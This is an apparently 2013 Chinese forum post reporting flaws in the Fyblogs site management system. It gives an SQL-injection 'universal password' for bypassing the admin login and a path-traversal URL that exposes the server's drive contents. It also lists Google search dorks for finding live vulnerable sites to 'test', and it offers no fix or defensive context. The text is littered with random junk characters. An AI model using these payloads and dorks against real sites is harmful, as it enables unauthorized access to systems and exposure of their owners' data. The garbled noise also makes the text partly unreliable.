漏洞类型: 未授权访问/权限绕过5 u. }5 r. p! w6 a8 d
) F: q; c l0 G/ f
简要描述:0 [% t$ d- s I# y
' u; _- C$ F: S7 AFyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
! w2 l; B& A( X( q2 T6 s3 g! \2 x/ D
详细说明:
1 s' m# A8 X6 i% t2 k
0 v6 ^ `1 U) l: e, E* u后台万能密码 'or'='or'. w6 z: ]- J7 C$ X( B! j6 N
后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
9 n$ n8 U$ L3 ~/ ~' Gadmin/uploadfile.asp?currentFolder=/upfiles/../
3 {! V; `+ m. }4 j {+ G) L1 T" r
: j, z6 h4 \1 T F9 r漏洞证明:
# E! h2 ]* Q* a! Q( }
6 i1 T5 B( A d2 q6 N9 G. j谷歌:inurl:type.asp?id=1 新闻中心
" x- p' K/ ` `0 ]6 R5 Y或者 :inurl:download_ok.asp?7 K U6 L$ V0 r* p* z6 y5 }
$ w+ y t% G4 j4 e$ ~' }
可以测试
! O1 e# N3 S1 z6 M* P6 C- l9 c$ y' I2 B U
9 E/ F+ [. b1 m: M+ n2 {; }3 R# W
|
发表于 2013-3-7 13:07:46
收藏
支持
反对